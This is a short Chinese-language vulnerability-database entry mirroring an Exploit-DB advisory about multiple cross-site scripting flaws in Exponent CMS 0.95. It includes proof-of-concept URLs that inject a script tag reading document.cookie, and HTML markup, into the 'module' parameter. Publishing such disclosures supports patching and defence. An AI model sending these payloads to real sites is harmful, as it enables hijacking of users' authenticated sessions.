Exponent CMS 0.95 - Multiple Cross-Site Scripting Vulnerabilities

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1055500 漏洞类型
发布时间 2005-12-25 更新时间 2005-12-25
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/25058
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/12358/info

Exponent is reported prone to multiple cross-site scripting vulnerabilities.

An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user facilitating theft of cookie-based authentication credentials and other attacks.

Exponent 0.95 is reported prone to these issues. It is likely that previous versions are vulnerable as well. 

http://www.example.com/endon/mod.php?action=[BLABLA]&module=[XSS]
http://www.example.com/expo/index.php?action=createuser&module=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/expo/index.php?action=view&id=2&module=<h1>Tes</h1>